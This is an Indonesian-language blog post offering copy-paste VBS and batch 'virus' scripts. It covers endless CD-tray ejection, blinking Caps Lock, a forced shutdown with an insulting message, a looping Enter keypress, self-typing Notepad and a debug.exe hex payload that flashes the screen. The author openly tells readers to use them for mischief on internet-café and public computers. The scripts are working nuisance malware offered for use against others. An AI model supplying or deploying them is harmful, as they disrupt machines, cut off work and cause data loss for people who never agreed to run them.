Script Code Membuat Virus Sederhana Dengan notepad





malem broooo,,,,, brembe kabare,,, wkwkwkwwk,,,, ne ane share script virus canggih,, di jamin komputer N laptop ente langsung mampus!!!!!.

ingat harus di gunakan untuk kejahatan.....!!! biasakan di gunakan di warnet dan tempat2 umum lainnyya,,, biar mampussssss........ wkwkwkwkwkw/..... langsung aja..




Membuat virus , DVD/CD Ghost,, (Keluar Masuk Sendiri) hehehe..

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Copy Paste script di atas di Notepad Dan Save dengan nama GhostCD.vbs


Membuat Virus, Lampu Caps lock  berkedip.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Copy Paste script di atas di Notepad Dan Save dengan nama DiscoCapslock.vbs

Membuat Virus, Auto Shutdown Dan pesan Hantu


@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Copy Paste script di atas di Notepad Dan Save dengan nama ShutdownGhost.bat



Membuat Virus, Enter menjadi gilaaa, (tertekan sendiri)

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Copy Paste script di atas di Notepad Dan Save dengan nama Entercrazy.Vbs


Membuat Virus, Notepad menulis sendiri


WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Copy Paste script di atas di Notepad Dan Save dengan nama TextGhost.Vbs


Membuat Virus, Screen Blank berwarna

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg


Copy Paste script di atas di Notepad Dan Save dengan nama Flashscreen.Bat

0 Response to "Script Code Membuat Virus Sederhana Dengan notepad"

Posting Komentar